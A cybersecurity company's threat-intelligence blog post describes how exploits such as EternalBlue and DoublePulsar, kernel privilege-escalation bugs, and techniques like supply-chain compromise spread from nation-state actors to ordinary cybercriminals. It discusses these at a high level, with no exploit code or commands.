Trickle-Treat: How Threat Actors Benefit From the Trickle-Down of Capabilities
As in many walks of life, cyber threat actors learn from the best. This means that the toolsets nation states and elite cybercriminals use to compromise high-profile victims are increasingly being dispersed and then used by an army of low-level criminal threat actors, who are much less selective in their targeting. The impact of this trickle-down effect in cyber capabilities is serious for the majority of companies, who now face a high volume of sophisticated attacks, often with basic objectives such as ransomware and cryptocurrency mining.
On 7 May, a new ransomware variant dubbed RobbinHood hit
local government offices in the US city of Baltimore. Later that month, the New
York Times published claims – disputed by the NSA – that RobbinHood used
EternalBlue; an exploit that targets the SMB (Server Message Block) protocol to
spread laterally across a network. EternalBlue was developed by the US National
Security Agency (NSA), though, in April 2017, was leaked by a group known as
The Shadow Brokers as part of a wider cache of tools. The history of the
exploit, from nation-state operations to standard malware campaigns is
therefore illustrative of the way that TTPs (tactics, techniques and
procedures) and tools typically filter down from more sophisticated threat actors
to those that are less capable.
Although the debate regarding this potential application of
EternalBlue continues, there are many other recent examples of the exploit’s
use in mundane cybercriminal activities – evidence, even, that its popularity
may be rising still.[1] In April, for example, we
reported on its use in a cryptocurrency mining campaign. The broader
cybercriminal interest in EternalBlue is further illustrated in the screenshot
below – taken from a Russian-language deep web forum – in which the poster
explains how fellow users can exploit the Metasploit modules for EternalBlue
and DoublePulsar.
The trickle-down of TTPs is not restricted to a flow from nation-state to cybercriminal, however. It is also true that capabilities filter between state actors of varying sophistication. EternalBlue, for example, is most famous for its use in North Korea’s May 2017 WannaCry ransomware attacks which famously cost the NHS an estimated £92 million.
Nor can this trickle-down effect only be illustrated by EternalBlue. DoublePulsar, for instance, was another NSA tool published in The Shadow Broker’s cache. Yet this May, reporting emerged suggesting that a threat actor working on behalf of the Chinese state was using it at least a year before it publicly leaked.[2]
Although this Chinese state group may have been provided
with the exploit by a third party, a more likely explanation is that it
reversed engineered the exploit, having initially been targeted with it. While
China deservedly earns its reputation as a top-tier actor in terms of its
offensive cyber capabilities, it is not quite on the same level as the likes of
the US or Israel. The Chinese use of its own version of DoublePulsar therefore represents
a further example of this trickle-down of capabilities.
Another good example of advanced exploits originally developed and used by sophisticated nation states being deployed in large-scale criminal operations is the increasing use of advanced kernel mode memory attacks by financially motivated criminals. Kernel mode and DLL side-loading, both of which were traditionally hallmarks of advanced nation-state activity, are now becoming commonplace in ordinary cybercriminal campaigns. PowerGhost, for instance, is a cryptocurrency miner which exploits CVE-2018-8120, a vulnerability in Windows’ kernel driver. Gh0st RAT, meanwhile, is an example of malware that uses side-loading, which can enable a threat actor to load malicious code via a trusted executable. Although Gh0st RAT was previously associated with Chinese state activity, its source code is now public, enabling less capable actors to use it in their own operations.
The image below shows a criminal in a Russian language forum selling access to a kernel memory mode exploit for CVE-2018-8120, which could enable an attack that is highly sophisticated, difficult to defend against and, once successful, very hard to mitigate. The use of such attack methods for relatively mundane criminal enterprises makes them a serious issue for most companies.
The threat from criminals exploiting sophisticated and powerful kernel mode memory attacks to deploy ransomware is exemplified by GandCrab. In September last year, we identified that the developer of GandCrab, a ransomware-as-a-service (RaaS) offering sold on cybercriminal forums, had released the latest version of their tool. Version 5 has a few small changes, and also includes an exploit for the aforementioned CVE-2018-8120. By exploiting it, an attacker could locally escalate their privileges, which GandCrab’s developer mentions via dark web forum posts (see below).
As we detail in the rest of this blog, the trickle-down of
capabilities can range from precise tactical imitation, involving the reuse of
particular tools and exploits, to broader targeting of specific
vulnerabilities, to, in the broadest sense, imitating general techniques.
Capabilities, as we have alluded to, can also filter between various types of
threat actors: from state to state, from states to cybercriminals or from
criminals to other, less sophisticated criminals.
Two Streams: How capabilities trickle-down via tools and vulnerabilities
As demonstrated by the examples of EternalBlue and
DoublePulsar, capabilities, in the narrowest of senses, can filter down in the
form of specific tools and exploits. This was further illustrated in January,
when reporting emerged suggesting that former NSA contractors working on behalf
of the UAE were using Karma, an NSA-developed spyware variant. Many less
sophisticated nation states seek to purchase their capabilities from commercial
spyware providers – such as the NSO Group – rather than develop their own.
Karma, however, is a rarer instance of a government seemingly obtaining its
capabilities from another state.
Capabilities can also trickle-down in the form of broader
vulnerabilities. While a tool like DoublePulsar exploits a vulnerability in a
particular way, other exploits offer more flexibility in how they are applied.
Typically a nation-state or a sophisticated cybercriminal group will initially
target a vulnerability shortly after it is publicly disclosed or, in rarer
cases, when it is a zero-day, lacking any sort of defensive patch. Once a
proof-of-concept for the exploit is publicly available, ordinary cybercriminals
will begin exploiting the vulnerability in their own operations.
An example of this is CVE-2018-0802, a vulnerability in
Microsoft Office’s Equation Editor which, in early 2018, was being exploited in
North Korean state operations. After disclosure of this operation, and the
subsequent emergence of proof-of-concept vulnerability code on GitHub (see
above), the CVE was by July 2018, among the exploits included in ThreadKit, a
cybercriminal service for automatically generating exploit-laden Office
documents. As the post below shows, ThreadKit is offered on a Russian language
cybercriminal forum, with its seller emphasising its custom functionality and
the process by which it operates.
CVE-2019-0604, a remote code execution vulnerability in
Microsoft Sharepoint, may yet see a similar journey. Sophisticated
cybercriminal groups such as FIN7 appear to be currently targeting this vulnerability,
suggesting that once exploit code is publicly available, less capable threat
actors may attempt to adopt it into their own operations.
The Trickle Becomes a Downpour: how broader techniques can even become accessible for unsophisticated adversaries
In the broadest of senses, capabilities can also filter down
in the form of wider techniques, not tied to particular tools or
vulnerabilities. Here is the greatest potential for trickle-down: while
ordinary cybercriminals may lack the sophistication to leverage specific
exploits or malware variants, broader techniques are typically less restrictive
in their technical demands.
This is true for supply chain compromises, which entail
compromising an organisation via a trusted supplier or third-party. While
traditionally associated with sophisticated state actors, such as China, who
often use it to infiltrate hardened targets in the technology sector, ordinary
cybercriminals are increasingly using the technique in their own campaigns, as
indicated in the graph below, which highlights the increasing number of reports
from our database in which supply chain compromise has been flagged as an
infection vector.
In February, for example, pro-Palestinian cyber activists
compromised a web accessibility plugin to simultaneously infect hundreds of
Israeli websites. The fact that supply chain compromise does not require
significant technical sophistication was illustrated by the perpetrators’ shortcomings:
while they aimed to infect web visitors with ransomware, they instead merely
presented them with defaced webpages.
Another broader technique filtering down is “living off the
land” through the misuse of native applications and processes. In an atmosphere
of increased political fallout following attribution, including public
indictments, nation-state actors are increasingly using this technique to avoid
detection and identification. Yet cybercriminals, likely seeing how the
technique aids evasion and can save costs on developing or purchasing malware,
are following suit. The Astaroth trojan, for example, as we reported on in
February, is exploiting legitimate Windows features such as WMI (Windows
Management Instrumentation) and BTSAdmin.
Conclusion: Locating the Leak at its Source
The trickle-down of TTPs, at all levels, serves to blur the
distinction between nation-state and cybercriminal actors, when both are using
the same tools, vulnerabilities and techniques. Furthermore, this process illustrates
the importance of detecting and analysing new TTPs as they emerge.
While a technique or an exploit may initially seem niche,
deployed in a limited fashion against select targets, it can eventually, as we
have argued, filter down into the hands of ordinary cybercriminals, thereby
becoming a much broader threat to a wider range of companies and organisations.
Awareness of these developments can therefore help to pre-empt tomorrow’s
threats.
Get our latest cyber intelligence insights straight into your inbox every week
Fill out the short form below to subscribe to our newsletter so that you never miss out on
our cyber intelligence insights and news.
Privacy Overview
This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.
Orpheus is a leading cybersecurity company that offers predictive and actionable intelligence to clients, enabling them to anticipate, prepare for, and respond to cyber threats. Our threat intelligence is used to create threat-led cyber risk ratings, providing a more accurate assessment of risk than just analysing an organisation’s attack surface. Products include; External attack surface management, risk-based vulnerability management, third-party supply chain risk management and cyber threat intelligence.
Strictly Necessary Cookies
These cookies are strictly necessary to provide you with services available through our website and to use some of its features. These must be enabled at all times, so that we can save your preferences.
Orpheus is a leading cybersecurity company that offers predictive and actionable intelligence to clients, enabling them to anticipate, prepare for, and respond to cyber threats. Our threat intelligence is used to create threat-led cyber risk ratings, providing a more accurate assessment of risk than just analysing an organisation’s attack surface. Products include; External attack surface management, risk-based vulnerability management, third-party supply chain risk management and cyber threat intelligence.
If you do not enable Strictly Necessary Cookies, we will not be able to save your preferences. This means that every time you visit this website you will need to enable or disable cookies again.
Orpheus is a leading cybersecurity company that offers predictive and actionable intelligence to clients, enabling them to anticipate, prepare for, and respond to cyber threats. Our threat intelligence is used to create threat-led cyber risk ratings, providing a more accurate assessment of risk than just analysing an organisation’s attack surface. Products include; External attack surface management, risk-based vulnerability management, third-party supply chain risk management and cyber threat intelligence.
3rd Party Cookies
This website uses Google Analytics to collect anonymous information such as the number of visitors to the site, and the most popular pages.
Keeping this cookie enabled helps us to improve our website.
Orpheus is a leading cybersecurity company that offers predictive and actionable intelligence to clients, enabling them to anticipate, prepare for, and respond to cyber threats. Our threat intelligence is used to create threat-led cyber risk ratings, providing a more accurate assessment of risk than just analysing an organisation’s attack surface. Products include; External attack surface management, risk-based vulnerability management, third-party supply chain risk management and cyber threat intelligence.
Please enable Strictly Necessary Cookies first so that we can save your preferences!
Orpheus is a leading cybersecurity company that offers predictive and actionable intelligence to clients, enabling them to anticipate, prepare for, and respond to cyber threats. Our threat intelligence is used to create threat-led cyber risk ratings, providing a more accurate assessment of risk than just analysing an organisation’s attack surface. Products include; External attack surface management, risk-based vulnerability management, third-party supply chain risk management and cyber threat intelligence.
Orpheus is a leading cybersecurity company that offers predictive and actionable intelligence to clients, enabling them to anticipate, prepare for, and respond to cyber threats. Our threat intelligence is used to create threat-led cyber risk ratings, providing a more accurate assessment of risk than just analysing an organisation’s attack surface. Products include; External attack surface management, risk-based vulnerability management, third-party supply chain risk management and cyber threat intelligence.
Request Demo Access
Fill out your details below and we'll be in touch to arrange demo access for you as soon as
possible.